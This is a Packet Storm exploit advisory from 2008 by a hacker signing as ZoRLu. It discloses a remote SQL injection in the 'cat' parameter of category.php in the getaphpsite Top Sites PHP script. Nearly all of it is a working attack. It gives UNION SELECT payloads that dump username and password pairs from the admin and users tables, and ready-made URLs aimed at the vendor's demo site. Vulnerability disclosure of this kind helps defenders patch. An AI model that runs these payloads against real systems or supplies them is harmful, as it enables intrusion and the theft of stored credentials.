getaphpsite Top Sites suffers from a remote SQL injection vulnerability in category.php.
bc514a5e20bc1b91505898c02d0626fd[~] getaphpsite Top Sites (cat) Remote Sql inj
[~]
[~] script: http://www.getaphpsite.com/24.html
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
[~]
[~] Date: 31.12.2008
[~]
[~] Home: www.z0rlu.blogspot.com / www.experl.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------
Exploit:
http://z0rlu.blogspot.com/script/category.php?cat=[SQL1] or [SQL2]
[SQL1]=
3+union+select+1,concat(username,0x3a,password),3,4,5+from+admin
[SQL2]=
3+union+select+1,concat(username,0x3a,password),3,4,5+from+users
for demo:
http://www.getaphpsite.com/demos/topsites/category.php?cat=3+union+select+1,concat(username,0x3a,password),3,4,5+from+admin
or
http://www.getaphpsite.com/demos/topsites/category.php?cat=3+union+select+1,concat(username,0x3a,password),3,4,5+from+users
[~]----------------------------------------------------------------------
[~] Greetz tO: yildirimordulari.org & experl.com
[~]
[~]----------------------------------------------------------------------
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!